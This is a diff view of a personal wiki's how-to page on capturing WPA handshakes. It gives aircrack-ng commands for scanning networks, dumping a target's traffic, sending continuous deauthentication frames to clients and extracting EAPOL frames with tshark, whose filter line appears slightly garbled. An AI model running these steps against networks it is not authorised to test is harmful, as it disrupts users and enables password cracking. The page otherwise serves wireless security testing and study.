Ben's notes

Linux, Unix, network, radio...

User Tools

Site Tools


capture_wpa_handshake

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Last revisionBoth sides next revision
capture_wpa_handshake [2014/06/12 20:58] – [Capture with wifite] admincapture_wpa_handshake [2014/06/14 22:01] admin
Line 167: Line 167:
 wlan0 Intel 6235 iwlwifi - [phy0] wlan0 Intel 6235 iwlwifi - [phy0]
  (monitor mode enabled on mon0)</code>  (monitor mode enabled on mon0)</code>
-  * Find nearest wireless networks. <code># airodump-ng mon0+  * Find nearest wireless networks. If targetting specific AP, fix channel with '-c <chan_num>' <code># airodump-ng mon0
  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06
  
Line 205: Line 205:
  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1
  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e            4</code>  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e            4</code>
-  * Dump packets from target channel. <code># airodump-ng --channel 11 --write channel11 mon0</code>+  * Dump packets from target channel. <code># airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0</code>
   * Wait for handshake... or   * Wait for handshake... or
   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>
   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>
   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>
capture_wpa_handshake.txt · Last modified: 2021/10/09 15:14 by 127.0.0.1